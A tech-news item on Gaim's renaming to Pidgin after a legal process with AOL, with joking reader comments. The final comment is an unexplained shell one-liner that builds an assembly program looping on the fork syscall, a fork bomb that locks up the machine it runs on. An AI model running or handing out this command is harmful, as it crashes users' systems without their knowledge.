Gaim Renamed — Now Pidgin IM
An anonymous reader writes "Announced on the Gaim mailing lists earlier today, the Gaim project is being renamed. This follows a lengthy and, unfortunately, secret legal process with AOL, which also prevented any code releases except betas. The project will now be known as Pidgin IM. Development is being migrated off of sourceforge.net as well and is now being hosted on developer.pidgin.im"
IM-speak is a lot like a pidgin language.
Tomorrow's headlines:
"AOL Instant Messenger changes name to Idgin"
GAAH! MY PRINTER IS ON FIRE!!! PUT IT OUT! PUT IT OUT!
Yes.
GAAH! MY PRINTER IS ON FIRE!!! PUT IT OUT! PUT IT OUT!
You can't change the world on an empty stomach, or something like that anyway.
Nerd rage is the funniest rage.
Are you suggesting that my new mail program called "Hey Boss I Fucked Your Wife" should be renamed? It's a perfectly good name I think.
Fascism trolls keeping me up every night. When I starts a preachin', he HITS ME WITH HIS REICH!
Actually, it's a good name for AOL's IM program. Because whenever I tried to use it, I get the feeling that the computer would waddle over and take a dump on my shoes.
BUT I WOULDNT BE ABLE TO POST ON THE INTERWEB IF IT WAZNT FOR AOL!!!1
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;